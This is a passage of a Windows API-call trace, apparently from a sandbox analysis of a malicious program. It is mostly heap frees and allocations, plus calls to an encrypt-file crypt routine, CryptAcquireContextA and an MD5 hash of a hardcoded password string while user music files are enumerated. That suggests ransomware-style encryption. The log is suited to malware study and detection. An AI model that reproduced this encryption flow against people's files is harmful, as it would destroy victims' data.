(hLibModule=0x772d0000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0117.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a42e8 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.090] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.090] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.090] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7860 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0117.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0117.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0117.092] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca7a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0117.092] CloseHandle (hObject=0x258) returned 1 [0117.092] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.092] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0117.093] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\ssO YlBHXom4.mp3", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ab12ae0, ftCreationTime.dwHighDateTime=0x1d5efe8, ftLastAccessTime.dwLowDateTime=0xb730d540, ftLastAccessTime.dwHighDateTime=0x1d5e103, ftLastWriteTime.dwLowDateTime=0xb730d540, ftLastWriteTime.dwHighDateTime=0x1d5e103, nFileSizeHigh=0x0, nFileSizeLow=0x12108, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="ssO YlBHXom4.mp3", cAlternateFileName="SSOYLB~1.MP3")) returned 0x41ac540 [0117.093] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0117.093] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0117.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0117.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0117.093] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4150) returned 1 [0117.094] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0117.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.094] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0117.094] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.094] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.094] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.094] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cae50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0117.094] CryptCreateHash (in: hProv=0x41a4150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0117.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.095] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2848 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0490 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0117.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2668 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0117.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2728 [0117.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e27e8 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03c8 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0117.096] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0117.096] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0117.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0117.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0117.098] 